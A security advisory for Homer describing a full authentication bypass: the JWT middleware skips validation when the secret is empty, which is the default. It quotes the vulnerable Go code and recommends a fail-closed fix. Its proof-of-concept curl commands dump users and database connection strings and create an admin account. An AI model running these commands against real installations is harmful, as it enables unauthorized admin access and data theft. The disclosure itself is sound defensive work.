Vulnerability GHSA-rqcc-94gv-wjm9
Summary
Homer: Complete Authentication Bypass When coordinator.jwt.secret Is Empty (Default)
Details
Summary
Both JWT middleware functions (JWTMiddleware and JWTMiddlewareV4) immediately return next(c) when jwtSecret == "". The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under /api/v1, /api/v3, and /api/v4 are completely unauthenticated.
Details
coordinator/handlers/auth.go lines 298-304:
func (h *Auth) JWTMiddleware() echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
if h.jwtSecret == "" {
return next(c) // bypass — no validation performed
}
coordinator/handlers/auth_v4_helpers.go lines 177-182:
func (h *Auth) JWTMiddlewareV4() echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
if h.jwtSecret == "" {
return next(c) // same bypass
coordinator/coordinator.go lines 315-317:
if c.config.JWT.Secret != "" {
protected.Use(authHandler.JWTMiddleware()) // middleware not even registered when secret is empty
}
config/config.go line 845: Secret field struct tag has default:"". The example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty.
PoC
# On a default Homer installation (no JWT secret configured), all protected routes are open:
curl http://<homer-host>/api/v3/users
# Returns full user list with no credentials
curl http://<homer-host>/api/v3/databases
# Returns all database connection strings
curl -X POST http://<homer-host>/api/v3/users \
-H 'Content-Type: application/json' \
-d '{"username":"attacker","password":"pw","partid":10,"usergroup":"admin"}'
# Creates a new admin user with no credentials
Impact
Missing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data.
Fix
Fail closed: if JWT.Secret is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions:
if h.jwtSecret == "" {
log.Fatal("coordinator.jwt.secret must be set to a non-empty value")
}
If possible, please apply for a CVE number when posting.
Related Vulnerabilities
Other vulnerabilities affecting the same packages